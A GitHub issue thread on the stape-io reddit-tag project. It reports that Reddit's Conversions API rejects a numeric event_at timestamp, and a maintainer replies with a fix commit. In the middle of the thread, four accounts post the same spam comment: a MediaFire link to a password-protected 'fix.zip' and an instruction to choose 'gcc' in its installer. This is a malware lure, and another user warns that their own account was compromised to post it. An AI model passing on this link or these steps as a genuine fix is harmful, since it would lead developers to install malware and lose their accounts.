### ISSUE TITLE
BUG - events.event_at

### ISSUE THREAD

**Issue by fresent** [stape-io/reddit-tag#5]
Format for reddit conversion api for field event_at is not correct.

Sample post request body to reddit api using GTM server side,

` {"events":[{"event_type":{"tracking_type":"PageVisit"},"event_at":1724673905,"user":{"uuid":"633975ee-xxxx-4ee3-ae18-27cd277b737d","ip_address":"x.x.x.x","user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"},"event_metadata":{"conversion_id":"1721857562782_17246745983821"}}],"test_mode":false}`

Response code from Reddit : 400
Response Error message : {"message":"JSON error "unexpected type number" on field "events.event_at""}

Looking at Reddit's document at https://business.reddithelp.com/helpcenter/s/article/conversions-api-parameters 
It's clear, that reddit requires the field in format "event_at": "2021-11-30T18:21:47.585Z"  and timestamp doesn't work.

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nxllxvxxd** [comment]
# **DO NOT DOWNLOAD ANYTHING I HAVE POSTED AS A COMMENT OR ANY OTHER MEDIAFIRE LINKS, MY ACCOUNT WAS COMPROMISED AND BEING USED TO COMPROMISE OTHERS AND YOURS WILL END UP BEING USED AS WELL**

**I AM WORKING ON DELETING AND POSTING THIS ON ALL THREADS IN WHICH THEY USED MY ACCOUNT TO POST THIS**

**Comment by Bukashk0zzz** [comment]
Hi, Thanks for the issue.
We added this to our backlog.

**Comment by Bukashk0zzz** [comment]
Fixed https://github.com/stape-io/reddit-tag/commit/41fee6a7a6b3e49466f93e13771baed9d5a6b069
